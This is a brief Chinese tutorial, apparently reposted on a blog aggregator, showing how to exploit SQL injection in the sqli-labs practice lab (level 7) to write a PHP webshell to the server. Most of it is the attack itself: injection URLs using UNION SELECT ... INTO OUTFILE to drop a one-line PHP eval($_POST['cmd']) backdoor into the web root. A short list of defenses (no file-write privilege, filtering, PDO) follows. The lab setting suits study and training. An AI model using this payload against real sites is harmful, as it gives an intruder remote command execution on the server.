利用注入写Webshell(sql-lab第七关)
生活随笔
收集整理的这篇文章主要介绍了
利用注入写Webshell(sql-lab第七关)
小编觉得挺不错的,现在分享给大家,帮大家做个参考.
结合PHP一句话木马
利用outfile生成文件
利用条件
1、文件具有写的条件
2、知道绝对路径
以sql-lab第七关为例
http://192.168.3.10/sqli/Less-7/?id=1——》
http://192.168.3.10/sqli/Less-7/?id=1’ union select xxx into outfile ‘绝对路径’ --+
——》http://192.168.3.10/sqli/Less-7/?id=1’ union select 1,2,’<?php eval($_POST["cmd"]);?>’ into outfile ‘D:\phpStudy\PHPTutorial\WWW\sqli\Less-7\kk.php’
查看一下生成的kk.php
防御:
不开启写条件
过滤
PDO
总结
以上是生活随笔为你收集整理的利用注入写Webshell(sql-lab第七关)的全部内容,希望文章能够帮你解决所遇到的问题。
- 上一篇: 基于边缘计算的森林火警监测系统
- 下一篇: 作者:丁伟(1972-),男,博士,中国